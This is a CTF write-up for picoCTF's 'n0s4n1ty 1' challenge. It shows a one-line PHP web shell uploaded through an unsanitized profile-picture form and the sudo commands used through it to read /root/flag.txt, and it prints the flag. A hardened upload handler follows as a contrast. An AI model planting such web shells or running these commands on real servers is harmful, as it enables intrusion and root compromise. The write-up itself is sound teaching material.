PicoGYM Web Exploitation Writeup | n0s4n1ty 1 | Easy | PicoCTF
easy ctf picoctf web easy-web easy-picoctf-web easy-picoctf picoctf-web
Originally posted on my Medium page.
This writeup covers the “n0s4n1ty 1” challenge from picoCTF 2025, authored by Prince Niyonshuti N., under the Web Exploitation category. The challenge revolves around a poorly implemented profile picture upload functionality on a website, which presents an opportunity for exploitation.
After entering the website, I came across a file upload feature.
The challenge description mentions that the upload is not sanitized, which means the server accepts any type of file.
I thought — why not upload a file that can run shell commands on the server?
But before going all in, let’s test the upload functionality first.
Let’s upload a dummy file to see what happens.
When we upload a simple file (like a .txt or an image), the application redirects to the uploads.php path. This tells us where our file ends up and how it might be accessed via URL.

Since there’s no restriction on file types, we can write a simple PHP web shell and upload it.
So, I created a file named shell.php with this content:
<?php system($_GET['cmd']); ?>
It takes whatever value is passed in the URL under the cmd parameter, runs it as a system command on the server, and then prints the output on the web page.
I uploaded the shell.php file successfully.
To run commands, I used the cmd parameter like this:
uploads/shell.php?cmd=whoami
Our goal is to find a hidden flag in the /root directory.
But since normal users can’t access /root, I needed to check if I had sudo privileges. I ran:
uploads/shell.php?cmd=sudo -l
This shows that the user www-data (us) can run any command as any user, including root, without a password.
→ Hurray!! This is full sudo access.
Let’s list the files in root with the command:
cmd=sudo ls /root
Finally, I read the flag using:
cmd=sudo cat /root/flag.txt
The flag is: picoCTF{wh47_c4n_u_d0_wPHP_4043cda3}
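For contrast with the vulnerable upload above, here is how the same profile-picture handler should have been written. This is an added example, not the challenge's code; the form field name pfp, the uploads directory and the 2 MB limit are assumptions.

```php
<?php
// Added example (not the challenge's code): a hardened profile-picture upload.
// Field name "pfp", destination directory and size limit are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads'; // serve this directory with PHP execution disabled
const MAX_BYTES  = 2 * 1024 * 1024;
// Allow-list: MIME type detected from the bytes => extension we will write.
// The client-supplied filename and Content-Type header are never trusted.
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function store_profile_picture(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the real content type from the file contents, not from the request.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('unsupported image type');
    }
    // Require the file to decode as an image; a script with a faked header fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-chosen random name: no user-controlled path and no .php extension possible.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not save file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['pfp'])) {
    try {
        $saved = store_profile_picture($_FILES['pfp']);
        echo 'stored as ' . htmlspecialchars($saved, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

The second finding, www-data being allowed to run any command via sudo without a password, is a separate server misconfiguration that this handler does not address; the web server account should have no sudo entry at all.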
📖 Want more CTF and OSINT writeups like this? Check out my Medium page here.